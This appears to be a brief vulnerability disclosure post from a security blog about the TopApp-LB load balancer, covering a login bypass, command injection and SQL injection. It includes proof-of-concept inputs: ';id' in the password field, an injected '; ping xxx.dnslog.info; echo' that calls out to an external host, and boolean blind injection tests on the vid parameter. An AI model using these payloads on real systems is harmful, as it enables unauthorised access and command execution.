0x00 vulnerability description
1. TopApp-LB system of TopApp-LB load balancing system directly login without password
2. TopApp-LB load balancing command execution vulnerability in TopApp-LB
3. TopApp-LB load balancing system Sql injection vulnerability in TopApp-LB
0x01 Vulnerability recurrence
1. Use poc:: user name is arbitrary, password: ;id
2. Use poc:; ping xxx.dnslog.info; echo
3.1, capture
3.2. Add single quotes to the vid parameter and report an error
3.3. Use or 1=1 or 1=2 to find that the return interface is different, which proves that there is an injection point (Boolean blind injection)
Please indicate: Adminxe's Blog » TopApp-LB Load Balancing System Vulnerability Summary